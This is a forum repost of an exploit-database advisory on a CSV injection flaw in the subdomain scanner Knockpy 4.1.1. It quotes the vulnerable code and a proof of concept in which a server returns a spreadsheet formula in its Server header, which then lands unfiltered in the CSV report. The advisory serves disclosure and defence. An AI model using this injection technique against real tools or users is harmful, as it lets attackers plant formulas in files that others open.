Knockpy 4.1.1 - CSV Injection - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日3年前

# Exploit Title: Knockpy 4.1.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2020-12-29
# Vendor Homepage: https://github.com/guelfoweb/knock
# Version : 4.1.1
# Tested on: Debian 9.13

Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.

Vulnerable code segment(s)

# knockpy.py

# row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
# subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))

# modules/save_report.py

# if fields:
#  csv_report += 'ip,status,type,domain_name,server\n'
# for item in report:
#  csv_report += item + '\n'
# report = csv_report


1. Example malicious Nginx config to return CSV formula headers:

http {
...    
  server_tokens off;
  more_set_headers 'Server: =1336+1';
...
}

2. Tester runs Knoockpy
root@host:~/# python knockpy/knockpy.py -c test.local

+ checking for virustotal subdomains: SKIP
	VirusTotal API_KEY not found
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
- scanning for subdomain...

Ip Address	Status	Type	Domain Name			Server
----------	------	----	-----------			------
127.0.0.1       200     host    appserver.test.local		=1336+1


CSV result

root@host:~/# cat test_local.csv
127.0.0.1,200,host,appserver.test.local,=1336+1
127.0.0.1,200,host,www.test.local,=1336+1

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Knockpy 4.1.1 - CSV Injection

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索